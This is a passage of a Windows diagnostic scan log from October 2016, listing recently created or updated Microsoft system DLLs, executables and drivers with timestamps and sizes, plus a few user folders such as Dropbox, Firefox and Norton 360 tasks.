2016-10-29 14:20 - 2016-10-14 23:55 - 00635904 _____ (Microsoft Corporation) C:\WINDOWS\system32\FlightSettings.dll
2016-10-29 14:20 - 2016-10-14 23:55 - 00329216 _____ (Microsoft Corporation) C:\WINDOWS\system32\wc_storage.dll
2016-10-29 14:20 - 2016-10-14 23:55 - 00142336 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.Devices.WiFi.dll
2016-10-29 14:20 - 2016-10-14 23:55 - 00126464 _____ (Microsoft Corporation) C:\WINDOWS\system32\wmpshell.dll
2016-10-29 14:20 - 2016-10-14 23:54 - 00463872 _____ (Microsoft Corporation) C:\WINDOWS\system32\daxexec.dll
2016-10-29 14:20 - 2016-10-14 23:54 - 00241152 _____ (Microsoft Corporation) C:\WINDOWS\system32\dafBth.dll
2016-10-29 14:20 - 2016-10-14 23:54 - 00102912 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\wmpshell.dll
2016-10-29 14:20 - 2016-10-14 23:53 - 00566784 _____ (Microsoft Corporation) C:\WINDOWS\system32\ActionCenterCPL.dll
2016-10-29 14:20 - 2016-10-14 23:53 - 00549376 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\ActionCenterCPL.dll
2016-10-29 14:20 - 2016-10-14 23:53 - 00313856 _____ (Microsoft Corporation) C:\WINDOWS\system32\moshostcore.dll
2016-10-29 14:20 - 2016-10-14 23:53 - 00198144 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\FSClient.dll
2016-10-29 14:20 - 2016-10-14 23:52 - 00432128 _____ (Microsoft Corporation) C:\WINDOWS\system32\WpAXHolder.dll
2016-10-29 14:20 - 2016-10-14 23:52 - 00410624 _____ (Microsoft Corporation) C:\WINDOWS\system32\cdpsvc.dll
2016-10-29 14:20 - 2016-10-14 23:52 - 00339456 _____ (Microsoft Corporation) C:\WINDOWS\system32\cdpusersvc.dll
2016-10-29 14:20 - 2016-10-14 23:52 - 00115200 _____ (Microsoft Corporation) C:\WINDOWS\system32\IdCtrls.dll
2016-10-29 14:20 - 2016-10-14 23:51 - 13868544 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.UI.Xaml.dll
2016-10-29 14:20 - 2016-10-14 23:51 - 00429568 _____ (Microsoft Corporation) C:\WINDOWS\system32\SndVolSSO.dll
2016-10-29 14:20 - 2016-10-14 23:50 - 02716672 _____ (Microsoft Corporation) C:\WINDOWS\system32\WsmSvc.dll
2016-10-29 14:20 - 2016-10-14 23:50 - 02333184 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\WsmSvc.dll
2016-10-29 14:20 - 2016-10-14 23:50 - 00310272 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\AppXDeploymentClient.dll
2016-10-29 14:20 - 2016-10-14 23:50 - 00090112 _____ (Microsoft Corporation) C:\WINDOWS\system32\updatepolicy.dll
2016-10-29 14:20 - 2016-10-14 23:49 - 01913344 _____ (Microsoft Corporation) C:\WINDOWS\system32\wsp_fs.dll
2016-10-29 14:20 - 2016-10-14 23:49 - 00838144 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\JpMapControl.dll
2016-10-29 14:20 - 2016-10-14 23:49 - 00111616 _____ (Microsoft Corporation) C:\WINDOWS\system32\MDMAppInstaller.exe
2016-10-29 14:20 - 2016-10-14 23:49 - 00033280 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\WSManHTTPConfig.exe
2016-10-29 14:20 - 2016-10-14 23:49 - 00032256 _____ (Microsoft Corporation) C:\WINDOWS\system32\WSManHTTPConfig.exe
2016-10-29 14:20 - 2016-10-14 23:48 - 01554944 _____ (Microsoft Corporation) C:\WINDOWS\system32\wsp_health.dll
2016-10-29 14:20 - 2016-10-14 23:48 - 01054208 _____ (Microsoft Corporation) C:\WINDOWS\system32\qmgr.dll
2016-10-29 14:20 - 2016-10-14 23:47 - 07792640 _____ (Microsoft Corporation) C:\WINDOWS\system32\BingMaps.dll
2016-10-29 14:20 - 2016-10-14 23:47 - 07626752 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\twinui.dll
2016-10-29 14:20 - 2016-10-14 23:47 - 00720896 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Media.BackgroundMediaPlayback.dll
2016-10-29 14:20 - 2016-10-14 23:46 - 03287552 _____ (Microsoft Corporation) C:\WINDOWS\system32\mispace.dll
2016-10-29 14:20 - 2016-10-14 23:46 - 00718848 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Media.Playback.BackgroundMediaPlayer.dll
2016-10-29 14:20 - 2016-10-14 23:46 - 00336896 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\msinfo32.exe
2016-10-29 14:20 - 2016-10-14 23:45 - 00942080 _____ (Microsoft Corporation) C:\WINDOWS\system32\audiosrv.dll
2016-10-29 14:20 - 2016-10-14 23:45 - 00702464 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Media.Playback.MediaPlayer.dll
2016-10-29 14:20 - 2016-10-14 23:45 - 00337920 _____ (Microsoft Corporation) C:\WINDOWS\system32\AudioEndpointBuilder.dll
2016-10-29 14:20 - 2016-10-14 23:43 - 02748928 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mispace.dll
2016-10-29 14:20 - 2016-10-14 23:43 - 01365504 _____ (Microsoft Corporation) C:\WINDOWS\system32\wpncore.dll
2016-10-29 14:20 - 2016-10-14 23:43 - 00078336 _____ (Microsoft Corporation) C:\WINDOWS\system32\iscsiwmi.dll
2016-10-29 14:20 - 2016-10-14 23:42 - 12349440 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\wmp.dll
2016-10-29 14:20 - 2016-10-14 23:42 - 06108672 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mos.dll
2016-10-29 14:20 - 2016-10-14 23:42 - 00130560 _____ (Microsoft Corporation) C:\WINDOWS\system32\chartv.dll
2016-10-29 14:20 - 2016-10-14 23:41 - 07654912 _____ (Microsoft Corporation) C:\WINDOWS\system32\mos.dll
2016-10-29 14:20 - 2016-10-14 23:41 - 05376000 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\BingMaps.dll
2016-10-29 14:20 - 2016-10-14 23:39 - 04474368 _____ (Microsoft Corporation) C:\WINDOWS\system32\D3DCompiler_47.dll
2016-10-29 14:20 - 2016-10-14 23:39 - 01060864 _____ (Microsoft Corporation) C:\WINDOWS\system32\JpMapControl.dll
2016-10-29 14:20 - 2016-10-14 23:39 - 01005568 _____ (Microsoft Corporation) C:\WINDOWS\system32\D3D12.dll
2016-10-29 14:20 - 2016-10-14 23:39 - 00869888 _____ (Microsoft Corporation) C:\WINDOWS\system32\wuapi.dll
2016-10-29 14:20 - 2016-10-14 23:39 - 00817664 _____ (Microsoft Corporation) C:\WINDOWS\system32\winhttp.dll
2016-10-29 14:20 - 2016-10-14 23:39 - 00357376 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Geolocation.dll
2016-10-29 14:20 - 2016-10-14 23:39 - 00109568 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\chartv.dll
2016-10-29 14:20 - 2016-10-14 23:38 - 13441024 _____ (Microsoft Corporation) C:\WINDOWS\system32\wmp.dll
2016-10-29 14:20 - 2016-10-14 23:38 - 00675840 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.Networking.dll
2016-10-29 14:20 - 2016-10-14 23:38 - 00579072 _____ (Microsoft Corporation) C:\WINDOWS\system32\LockAppBroker.dll
2016-10-29 14:20 - 2016-10-14 23:37 - 04708864 _____ (Microsoft Corporation) C:\WINDOWS\system32\ExplorerFrame.dll
2016-10-29 14:20 - 2016-10-14 23:37 - 02256896 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\wininet.dll
2016-10-29 14:20 - 2016-10-14 23:37 - 01980416 _____ (Microsoft Corporation) C:\WINDOWS\system32\diagtrack.dll
2016-10-29 14:20 - 2016-10-14 23:37 - 01029632 _____ (Microsoft Corporation) C:\WINDOWS\system32\MapsStore.dll
2016-10-29 14:20 - 2016-10-14 23:37 - 00715264 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\MapControlCore.dll
2016-10-29 14:20 - 2016-10-14 23:37 - 00093184 _____ (Microsoft Corporation) C:\WINDOWS\system32\cmifw.dll
2016-10-29 14:20 - 2016-10-14 23:36 - 02484736 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\gameux.dll
2016-10-29 14:20 - 2016-10-14 23:36 - 01595392 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\urlmon.dll
2016-10-29 14:20 - 2016-10-14 23:36 - 01556992 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.UI.Immersive.dll
2016-10-29 14:20 - 2016-10-14 23:36 - 01492480 _____ (Microsoft Corporation) C:\WINDOWS\system32\lsasrv.dll
2016-10-29 14:20 - 2016-10-14 23:36 - 01359360 _____ (Microsoft Corporation) C:\WINDOWS\system32\usercpl.dll
2016-10-29 14:20 - 2016-10-14 23:36 - 00881664 _____ (Microsoft Corporation) C:\WINDOWS\system32\authui.dll
2016-10-29 14:20 - 2016-10-14 23:36 - 00792064 _____ (Microsoft Corporation) C:\WINDOWS\system32\spoolsv.exe
2016-10-29 14:20 - 2016-10-14 23:36 - 00673792 _____ (Microsoft Corporation) C:\WINDOWS\system32\winlogon.exe
2016-10-29 14:20 - 2016-10-14 23:36 - 00580608 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\hgcpl.dll
2016-10-29 14:20 - 2016-10-14 23:36 - 00542208 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.Networking.Connectivity.dll
2016-10-29 14:20 - 2016-10-14 23:35 - 03054080 _____ (Microsoft Corporation) C:\WINDOWS\system32\esent.dll
2016-10-29 14:20 - 2016-10-14 23:35 - 02999808 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\win32kfull.sys
2016-10-29 14:20 - 2016-10-14 23:35 - 02708992 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\esent.dll
2016-10-29 14:20 - 2016-10-14 23:35 - 02315264 _____ (Microsoft Corporation) C:\WINDOWS\system32\wuaueng.dll
2016-10-29 14:20 - 2016-10-14 23:35 - 00905216 _____ (Microsoft Corporation) C:\WINDOWS\system32\MapControlCore.dll
2016-10-29 14:20 - 2016-10-14 23:35 - 00798208 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\authui.dll
2016-10-29 14:20 - 2016-10-14 23:35 - 00760832 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\NMAA.dll
2016-10-29 14:20 - 2016-10-14 23:35 - 00483328 _____ (Microsoft Corporation) C:\WINDOWS\system32\twinapi.dll
2016-10-29 14:20 - 2016-10-14 23:35 - 00422400 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\twinapi.dll
2016-10-29 14:20 - 2016-10-14 23:34 - 02688512 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.UI.Logon.dll
2016-10-29 14:20 - 2016-10-14 23:34 - 01840640 _____ (Microsoft Corporation) C:\WINDOWS\system32\FntCache.dll
2016-10-29 14:20 - 2016-10-14 23:34 - 01726976 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.UI.Immersive.dll
2016-10-29 14:20 - 2016-10-14 23:34 - 00936448 _____ (Microsoft Corporation) C:\WINDOWS\system32\NMAA.dll
2016-10-29 14:20 - 2016-10-14 23:32 - 00886784 _____ (Microsoft Corporation) C:\WINDOWS\system32\CPFilters.dll
2016-10-29 14:20 - 2016-08-06 00:17 - 00619368 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\cng.sys
2016-10-29 14:19 - 2016-10-15 00:38 - 00409952 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\FWPKCLNT.SYS
2016-10-29 14:19 - 2016-10-15 00:32 - 00601712 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\oleaut32.dll
2016-10-29 14:19 - 2016-10-15 00:31 - 02750384 _____ (Microsoft Corporation) C:\WINDOWS\system32\iertutil.dll
2016-10-29 14:19 - 2016-10-15 00:31 - 02190688 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\dxgkrnl.sys
2016-10-29 14:19 - 2016-10-15 00:31 - 00658272 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\dxgmms2.sys
2016-10-29 14:19 - 2016-10-15 00:31 - 00402272 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\dxgmms1.sys
2016-10-29 14:19 - 2016-10-15 00:30 - 00557408 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\spaceport.sys
2016-10-29 14:19 - 2016-10-15 00:29 - 00335712 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\pci.sys
2016-10-29 14:19 - 2016-10-15 00:26 - 01694712 _____ (Microsoft Corporation) C:\WINDOWS\system32\winmde.dll
2016-10-29 14:19 - 2016-10-15 00:26 - 00160096 _____ (Microsoft Corporation) C:\WINDOWS\system32\CloudExperienceHostBroker.dll
2016-10-29 14:19 - 2016-10-15 00:21 - 02537824 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\tcpip.sys
2016-10-29 14:19 - 2016-10-15 00:21 - 01100128 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\http.sys
2016-10-29 14:19 - 2016-10-15 00:21 - 00584032 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\afd.sys
2016-10-29 14:19 - 2016-10-15 00:20 - 02276736 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\d3d11.dll
2016-10-29 14:19 - 2016-10-15 00:19 - 00272720 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\wintrust.dll
2016-10-29 14:19 - 2016-10-15 00:18 - 02166232 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\combase.dll
2016-10-29 14:19 - 2016-10-15 00:18 - 01556712 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\crypt32.dll
2016-10-29 14:19 - 2016-10-15 00:18 - 00846560 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\WinTypes.dll
2016-10-29 14:19 - 2016-10-15 00:15 - 03892352 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mfcore.dll
2016-10-29 14:19 - 2016-10-15 00:15 - 01853776 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mfmp4srcsnk.dll
2016-10-29 14:19 - 2016-10-15 00:15 - 01123368 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mfplat.dll
2016-10-29 14:19 - 2016-10-15 00:15 - 00952416 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mfsvr.dll
2016-10-29 14:19 - 2016-10-15 00:15 - 00687936 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\msvproc.dll
2016-10-29 14:19 - 2016-10-15 00:11 - 01435896 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\user32.dll
2016-10-29 14:19 - 2016-10-15 00:02 - 22568960 _____ (Microsoft Corporation) C:\WINDOWS\system32\edgehtml.dll
2016-10-29 14:19 - 2016-10-15 00:00 - 00323584 _____ (Microsoft Corporation) C:\WINDOWS\system32\twinui.pcshell.dll
2016-10-29 14:19 - 2016-10-14 23:59 - 00018432 _____ (Microsoft Corporation) C:\WINDOWS\system32\stdole2.tlb
2016-10-29 14:19 - 2016-10-14 23:57 - 00081408 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mshtmled.dll
2016-10-29 14:19 - 2016-10-14 23:56 - 00327680 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\daxexec.dll
2016-10-29 14:19 - 2016-10-14 23:56 - 00227328 _____ (Microsoft Corporation) C:\WINDOWS\system32\cdd.dll
2016-10-29 14:19 - 2016-10-14 23:56 - 00219648 _____ (Microsoft Corporation) C:\WINDOWS\system32\AudioSrvPolicyManager.dll
2016-10-29 14:19 - 2016-10-14 23:55 - 00265728 _____ (Microsoft Corporation) C:\WINDOWS\system32\dhcpcore6.dll
2016-10-29 14:19 - 2016-10-14 23:55 - 00156672 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\hidclass.sys
2016-10-29 14:19 - 2016-10-14 23:54 - 00410112 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\SndVolSSO.dll
2016-10-29 14:19 - 2016-10-14 23:54 - 00314880 _____ (Microsoft Corporation) C:\WINDOWS\system32\FSClient.dll
2016-10-29 14:19 - 2016-10-14 23:54 - 00296960 _____ (Microsoft Corporation) C:\WINDOWS\system32\mfsensorgroup.dll
2016-10-29 14:19 - 2016-10-14 23:54 - 00152064 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\autoplay.dll
2016-10-29 14:19 - 2016-10-14 23:53 - 00270336 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\dxtrans.dll
2016-10-29 14:19 - 2016-10-14 23:52 - 00690176 _____ (Microsoft Corporation) C:\WINDOWS\system32\ieproxy.dll
2016-10-29 14:19 - 2016-10-14 23:52 - 00632832 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\sud.dll
2016-10-29 14:19 - 2016-10-14 23:52 - 00523776 _____ (Microsoft Corporation) C:\WINDOWS\system32\MusUpdateHandlers.dll
2016-10-29 14:19 - 2016-10-14 23:52 - 00506880 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\DevicePairing.dll
2016-10-29 14:19 - 2016-10-14 23:52 - 00306176 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\ieproxy.dll
2016-10-29 14:19 - 2016-10-14 23:52 - 00288256 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\systemcpl.dll
2016-10-29 14:19 - 2016-10-14 23:52 - 00088576 _____ (Microsoft Corporation) C:\WINDOWS\system32\mshtmled.dll
2016-10-29 14:19 - 2016-10-14 23:51 - 00261632 _____ (Microsoft Corporation) C:\WINDOWS\system32\indexeddbserver.dll
2016-10-29 14:19 - 2016-10-14 23:51 - 00226304 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\dhcpcore6.dll
2016-10-29 14:19 - 2016-10-14 23:50 - 00896512 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\fontext.dll
2016-10-29 14:19 - 2016-10-14 23:50 - 00438784 _____ (Microsoft Corporation) C:\WINDOWS\system32\EncDec.dll
2016-10-29 14:19 - 2016-10-14 23:50 - 00198656 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\indexeddbserver.dll
2016-10-29 14:19 - 2016-10-14 23:49 - 00388608 _____ (Microsoft Corporation) C:\WINDOWS\system32\zipfldr.dll
2016-10-29 14:19 - 2016-10-14 23:49 - 00348672 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\zipfldr.dll
2016-10-29 14:19 - 2016-10-14 23:48 - 23680000 _____ (Microsoft Corporation) C:\WINDOWS\system32\mshtml.dll
2016-10-29 14:19 - 2016-10-14 23:47 - 04612608 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.Media.dll
2016-10-29 14:19 - 2016-10-14 23:47 - 00369664 _____ (Microsoft Corporation) C:\WINDOWS\system32\msinfo32.exe
2016-10-29 14:19 - 2016-10-14 23:46 - 19418112 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\edgehtml.dll
2016-10-29 14:19 - 2016-10-14 23:46 - 19416576 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mshtml.dll
2016-10-29 14:19 - 2016-10-14 23:45 - 01790464 _____ (Microsoft Corporation) C:\WINDOWS\system32\LocationFramework.dll
2016-10-29 14:19 - 2016-10-14 23:44 - 03307520 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\MFMediaEngine.dll
2016-10-29 14:19 - 2016-10-14 23:44 - 00636928 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\winhttp.dll
2016-10-29 14:19 - 2016-10-14 23:42 - 00956416 _____ (Microsoft Corporation) C:\WINDOWS\system32\AppXDeploymentExtensions.desktop.dll
2016-10-29 14:19 - 2016-10-14 23:42 - 00805376 _____ (Microsoft Corporation) C:\WINDOWS\system32\FrameServer.dll
2016-10-29 14:19 - 2016-10-14 23:42 - 00467968 _____ (Microsoft Corporation) C:\WINDOWS\system32\Geolocation.dll
2016-10-29 14:19 - 2016-10-14 23:42 - 00076800 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\powercfg.exe
2016-10-29 14:19 - 2016-10-14 23:41 - 00945664 _____ (Microsoft Corporation) C:\WINDOWS\system32\iphlpsvc.dll
2016-10-29 14:19 - 2016-10-14 23:41 - 00161792 _____ (Microsoft Corporation) C:\WINDOWS\system32\EditionUpgradeHelper.dll
2016-10-29 14:19 - 2016-10-14 23:40 - 01690112 _____ (Microsoft Corporation) C:\WINDOWS\system32\AppXDeploymentExtensions.onecore.dll
2016-10-29 14:19 - 2016-10-14 23:39 - 02266624 _____ (Microsoft Corporation) C:\WINDOWS\system32\AppXDeploymentServer.dll
2016-10-29 14:19 - 2016-10-14 23:39 - 00806400 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\D3D12.dll
2016-10-29 14:19 - 2016-10-14 23:39 - 00631296 _____ (Microsoft Corporation) C:\WINDOWS\system32\NotificationController.dll
2016-10-29 14:19 - 2016-10-14 23:39 - 00243712 _____ (Microsoft Corporation) C:\WINDOWS\system32\shdocvw.dll
2016-10-29 14:19 - 2016-10-14 23:38 - 02458112 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\themecpl.dll
2016-10-29 14:19 - 2016-10-14 23:37 - 03733504 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\D3DCompiler_47.dll
2016-10-29 14:19 - 2016-10-14 23:37 - 00884224 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\inetcomm.dll
2016-10-29 14:19 - 2016-10-14 23:37 - 00712192 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.UI.Search.dll
2016-10-29 14:19 - 2016-10-14 23:37 - 00709120 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\CPFilters.dll
2016-10-29 14:19 - 2016-10-14 23:36 - 04423680 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\ExplorerFrame.dll
2016-10-29 14:19 - 2016-10-14 23:36 - 01637888 _____ (Microsoft Corporation) C:\WINDOWS\system32\ieapfltr.dll
2016-10-29 14:19 - 2016-10-14 23:36 - 01170944 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.Media.Speech.dll
2016-10-29 14:19 - 2016-10-14 23:36 - 00983040 _____ (Microsoft Corporation) C:\WINDOWS\system32\RemoteNaturalLanguage.dll
2016-10-29 14:19 - 2016-10-14 23:36 - 00909824 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.UI.Search.dll
2016-10-29 14:19 - 2016-10-14 23:36 - 00358912 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\stobject.dll
2016-10-29 14:19 - 2016-10-14 23:35 - 02670592 _____ (Microsoft Corporation) C:\WINDOWS\system32\wininet.dll
2016-10-29 14:19 - 2016-10-14 23:35 - 02005504 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\DWrite.dll
2016-10-29 14:19 - 2016-10-14 23:35 - 01779712 _____ (Microsoft Corporation) C:\WINDOWS\system32\urlmon.dll
2016-10-29 14:19 - 2016-10-14 23:35 - 01512960 _____ (Microsoft Corporation) C:\WINDOWS\system32\win32kbase.sys
2016-10-29 14:19 - 2016-10-14 23:35 - 01509376 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\ieapfltr.dll
2016-10-29 14:19 - 2016-10-14 23:34 - 02476544 _____ (Microsoft Corporation) C:\WINDOWS\system32\DWrite.dll
2016-10-29 07:57 - 2016-10-29 07:57 - 00000000 ____D C:\Users\Harold\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Dropbox
2016-10-23 10:52 - 2016-10-30 11:58 - 00000000 ____D C:\Program Files (x86)\Mozilla Firefox
2016-10-20 18:31 - 2016-10-20 18:40 - 00000000 ____D C:\Users\Harold\Documents\2016 Oct Color Ride
2016-10-16 18:40 - 2016-10-30 17:47 - 00000000 ____D C:\WINDOWS\System32\Tasks\Norton 360
2016-10-16 18:34 - 2016-10-16 18:34 - 00003376 _____ C:\WINDOWS\System32\Tasks\Norton WSC Integration
2016-10-12 21:35 - 2016-10-05 06:17 - 01322848 _____ (Microsoft Corporation) C:\WINDOWS\system32\wpx.dll
2016-10-12 21:35 - 2016-10-05 06:13 - 01859264 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.ApplicationModel.Store.dll
2016-10-12 21:35 - 2016-10-05 06:13 - 00146784 _____ (Microsoft Corporation) C:\WINDOWS\system32\CloudExperienceHostCommon.dll
2016-10-12 21:35 - 2016-10-05 06:12 - 02446696 _____ (Microsoft Corporation) C:\WINDOWS\system32\msxml6.dll
2016-10-12 21:35 - 2016-10-05 06:09 - 00064352 _____ (Avago Technologies) C:\WINDOWS\system32\Drivers\MegaSas2i.sys
2016-10-12 21:35 - 2016-10-05 05:51 - 01430720 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.ApplicationModel.Store.dll
2016-10-12 21:35 - 2016-10-05 05:38 - 00237568 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Web.Diagnostics.dll
2016-10-12 21:35 - 2016-10-05 05:36 - 00113664 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Networking.ServiceDiscovery.Dnssd.dll
2016-10-12 21:35 - 2016-10-05 05:35 - 00196096 _____ (Microsoft Corporation) C:\WINDOWS\system32\UserDeviceRegistration.dll
2016-10-12 21:35 - 2016-10-05 05:35 - 00101888 _____ (Microsoft Corporation) C:\WINDOWS\system32\UserDeviceRegistration.Ngc.dll
2016-10-12 21:35 - 2016-10-05 05:33 - 00651264 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Devices.AllJoyn.dll
2016-10-12 21:35 - 2016-10-05 05:33 - 00268800 _____ (Microsoft Corporation) C:\WINDOWS\system32\UserMgrProxy.dll
2016-10-12 21:35 - 2016-10-05 05:33 - 00157696 _____ (Microsoft Corporation) C:\WINDOWS\system32\credprovs.dll
2016-10-12 21:35 - 2016-10-05 05:32 - 00590336 _____ (Microsoft Corporation) C:\WINDOWS\system32\efswrt.dll
2016-10-12 21:35 - 2016-10-05 05:32 - 00146432 _____ (Microsoft Corporation) C:\WINDOWS\system32\AuthBroker.dll
2016-10-12 21:35 - 2016-10-05 05:31 - 00480768 _____ (Microsoft Corporation) C:\WINDOWS\system32\dsreg.dll
2016-10-12 21:35 - 2016-10-05 05:31 - 00425472 _____ (Microsoft Corporation) C:\WINDOWS\system32\bcdedit.exe
2016-10-12 21:35 - 2016-10-05 05:30 - 00396800 _____ (Microsoft Corporation) C:\WINDOWS\system32\ncsi.dll
2016-10-12 21:35 - 2016-10-05 05:29 - 00368640 _____ (Microsoft Corporation) C:\WINDOWS\system32\nlasvc.dll
2016-10-12 21:35 - 2016-10-05 05:28 - 00156672 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\UserDeviceRegistration.dll
2016-10-12 21:35 - 2016-10-05 05:26 - 00590848 _____ (Microsoft Corporation) C:\WINDOWS\system32\vbscript.dll
2016-10-12 21:35 - 2016-10-05 05:26 - 00184320 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\UserMgrProxy.dll
2016-10-12 21:35 - 2016-10-05 05:26 - 00137216 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\credprovs.dll
2016-10-12 21:35 - 2016-10-05 05:26 - 00088576 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\UserDeviceRegistration.Ngc.dll
2016-10-12 21:35 - 2016-10-05 05:25 - 01589248 _____ (Microsoft Corporation) C:\WINDOWS\system32\msdtctm.dll
2016-10-12 21:35 - 2016-10-05 05:25 - 00822784 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Chakradiag.dll
2016-10-12 21:35 - 2016-10-05 05:25 - 00404992 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\dsreg.dll
2016-10-12 21:35 - 2016-10-05 05:25 - 00299520 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\UserDataAccountApis.dll
2016-10-12 21:35 - 2016-10-05 05:25 - 00117760 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\AuthBroker.dll
2016-10-12 21:35 - 2016-10-05 05:24 - 00483840 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.Devices.AllJoyn.dll
2016-10-12 21:35 - 2016-10-05 05:24 - 00099328 _____ (Microsoft Corporation) C:\WINDOWS\system32\adsmsext.dll
2016-10-12 21:35 - 2016-10-05 05:23 - 00431616 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\efswrt.dll
2016-10-12 21:35 - 2016-10-05 05:23 - 00426496 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.ApplicationModel.Wallet.dll
2016-10-12 21:35 - 2016-10-05 05:23 - 00284672 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\apprepsync.dll
2016-10-12 21:35 - 2016-10-05 05:23 - 00187904 _____ (Microsoft Corporation) C:\WINDOWS\system32\dialclient.dll
2016-10-12 21:35 - 2016-10-05 05:23 - 00125952 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\apprepapi.dll
2016-10-12 21:35 - 2016-10-05 05:21 - 03689984 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\msi.dll
2016-10-12 21:35 - 2016-10-05 05:21 - 00567808 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\ChatApis.dll
